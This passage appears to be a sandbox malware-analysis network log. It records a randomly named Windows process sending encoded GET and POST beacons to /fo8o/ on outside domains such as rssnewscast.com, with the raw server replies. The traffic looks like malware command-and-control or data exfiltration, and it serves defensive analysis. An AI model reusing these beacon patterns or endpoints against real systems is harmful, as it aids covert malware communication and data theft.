Jan 15, 2025 08:29:30.265819073 CET	532	OUT	GET /fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:30:30.970251083 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49913	91.195.240.94	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:30:36.024121046 CET	790	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50 Data Ascii: pnGX8L3p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
Jan 15, 2025 08:30:36.677772045 CET	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 15 Jan 2025 07:30:36 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49914	91.195.240.94	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:30:38.716013908 CET	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d Data Ascii: pnGX8L3p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
Jan 15, 2025 08:30:39.366835117 CET	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 15 Jan 2025 07:30:39 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49915	91.195.240.94	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:30:41.252074003 CET	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 77 6a 67 5a 67 33 54 38 58 6f 6d 56 6a 6d 6f 4b 79 67 56 33 62 54 52 31 66 6d 45 79 6a 50 6e 59 6b 47 6d 6b 41 4e 56 45 4f 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 79 2b 61 4a 62 59 31 5a 48 78 31 41 61 67 46 6b 4d 43 2f 78 36 39 56 2b 67 36 67 49 4a 52 42 2b 63 46 6e 7a 4f 31 73 77 61 33 61 77 57 72 65 58 66 5a 65 34 66 34 4f 67 4b 44 72 48 4f 74 64 6a 79 68 53 66 4d 69 69 72 70 62 46 6a 45 55 48 [TRUNCATED] Data Ascii: pnGX8L3p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumwjgZg3T8XomVjmoKygV3bTR1fmEyjPnYkGmkANVEOhO17FrO7yLilZzLBgYBWpkGikynLpHh/y+aJbY1ZHx1AagFkMC/x69V+g6gIJRB+cFnzO1swa3awWreXfZe4f4OgKDrHOtdjyhSfMiirpbFjEUHbMdG8QfHTNHSA7tyZbJWfktDUtH9Vl4Gtq8+Ux/87b5vyBZlZYyttEcaYKi5Hr/Xwb9YLa2Yei/i9KdGN+ekuKAs4DWiqxPCl4h2D2WoPC2Im4LogCU9lEEunC3sdeZQsmzQEnRbiKzvlwJNNZMxkvX/iVUERy7NOcDrGglvWoA//QUJEUrWPAY6bAMuMHldSMDP73WLT/pcef5/eW/phVo3fiAIBIROfcD9pck17f9HLmGF+97KsTXAUSztBb1dglkU5bNDcIl7v4KEW2ezPEtIRzZ1Zvr+Qw/CldBPqYVaiGAbSfwKEdVQBeyWPBT2HgRPcq+pzSZ6hUDvFvX2jyem3v45KFKbEmo+k7N7coOpbPeS9IU5yGQ9dOJkE+sjueUwnXVoxD4ADrgEf9O1w8kIe3k+csb6hu3H8aMIM9szpOhAPv5oN429yEancjxPR4b8FsR4zMEeZD1AjVw2ohXwyv92mSegKgAIr+Ing6DiEGhIs5gNTJZ5y8rfSHKYhPSbwts/AuiHka1aGruK0xGZNDf6subQ987NoQUggtQ0J0nbdgVp6LMofjRX6dZdO6n4Xziut9vo8m2lR3l8kBtheU1WEFXC1J60k/sILCq5v1cil9pn/9isZXUq61rkHNyID53h+JoEv2dtekja9jUQzXrR8gnSLE [TRUNCATED]
Jan 15, 2025 08:30:41.895771980 CET	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 15 Jan 2025 07:30:41 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49916	91.195.240.94	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:30:43.781824112 CET	533	OUT	GET /fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:30:44.635128021 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 15 Jan 2025 07:30:44 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CFc1goqyp60YdxQp4WFnub2D1AJ1I4Nj++L4Q80kxQClfjjOZcfsyonhLjtTD3jOPmsfMN994Wa4WKq7Pbek5g== last-modified: Wed, 15 Jan 2025 07:30:44 GMT x-cache-miss-from: parking-867c7c867-jt2dd server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 43 46 63 31 67 6f 71 79 70 36 30 59 64 78 51 70 34 57 46 6e 75 62 32 44 31 41 4a 31 49 34 4e 6a 2b 2b 4c 34 51 38 30 6b 78 51 43 6c 66 6a 6a 4f 5a 63 66 73 79 6f 6e 68 4c 6a 74 54 44 33 6a 4f 50 6d 73 66 4d 4e 39 39 34 57 61 34 57 4b 71 37 50 62 65 6b 35 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CFc1goqyp60YdxQp4WFnub2D1AJ1I4Nj++L4Q80kxQClfjjOZcfsyonhLjtTD3jOPmsfMN994Wa4WKq7Pbek5g==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Jan 15, 2025 08:30:44.635144949 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
Jan 15, 2025 08:30:44.635154963 CET	1236	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
Jan 15, 2025 08:30:44.635164976 CET	672	IN	Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
Jan 15, 2025 08:30:44.635175943 CET	1236	IN	Data Raw: 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d Data Ascii: iner-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:9%}.container-content__container-ads{margin-top:8%}.cont
Jan 15, 2025 08:30:44.635185957 CET	1236	IN	Data Raw: 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b Data Ascii: er-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{te
Jan 15, 2025 08:30:44.635198116 CET	1236	IN	Data Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 73 65 61 72 63 68 Data Ascii: ine-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin-
Jan 15, 2025 08:30:44.635207891 CET	672	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d 61 Data Ascii: content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,
Jan 15, 2025 08:30:44.635217905 CET	1236	IN	Data Raw: 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f Data Ascii: on:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:i
Jan 15, 2025 08:30:44.635230064 CET	1236	IN	Data Raw: 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 Data Ascii: -size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-colo
Jan 15, 2025 08:30:44.640238047 CET	1236	IN	Data Raw: 6e 67 2d 72 69 67 68 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 Data Ascii: ng-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49917	66.29.149.46	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
